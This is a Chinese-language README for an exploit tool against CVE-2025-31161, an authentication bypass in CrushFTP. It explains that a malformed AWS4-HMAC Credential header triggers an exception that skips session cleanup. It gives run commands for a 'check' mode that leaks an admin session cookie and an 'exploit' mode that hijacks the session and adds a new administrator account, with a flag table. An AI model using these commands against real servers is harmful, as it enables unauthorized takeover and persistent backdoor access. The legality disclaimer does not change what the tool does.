警告: 此工具仅用于经授权的安全测试和教育目的。未经明确许可对系统进行未授权测试属于违法行为。
此工具是 CVE-2025-31161 的概念验证(PoC),该漏洞是 CrushFTP(版本 < 10.8.4 和 < 11.3.1)中的一个严重认证绕过漏洞。该漏洞利用了 AWS4-HMAC 头部解析中的逻辑错误,损坏的头部会触发 IndexOutOfBounds 异常。此异常会阻止服务器清理会话,从而在无需密码的情况下,让用户以所请求账户的身份完成认证。
Credential=user/)触发未处理的 Java 异常,绕过会话清理。requests 库pip install requests
该脚本以两种模式运行:检测(观察)和利用(操作)。
通过尝试泄漏默认管理员账户的会话 Cookie 来验证目标是否存在漏洞。此模式不会修改目标系统。
python3 exploit.py check -u <target_ip> -p <port>
python3 exploit.py check -u 192.168.1.50 -p 8080劫持指定管理用户的会话,并利用该会话向 MainUsers 组注入一个新的管理员账户。
python3 exploit.py exploit -u <target_ip> -p <port> -a <admin_user> -nu <new_username> -np <new_password>
python3 exploit.py exploit -u 192.168.1.50 -p 8080 -a crushadmin -nu operator -np StrongPass123!| 标志 | 名称 | 描述 | 默认值 |
|---|---|---|---|
-u | --url | 目标 IP 地址或主机名 | 必填 |
-p | --port | 目标端口 | 8080 |
-a | --admin_user | 要模拟的现有管理员账户 | crushadmin |
-nu | --new_user | 新管理员账户的用户名 | 必填 |
-np | --new_password | 新管理员账户的密码 | 必填 |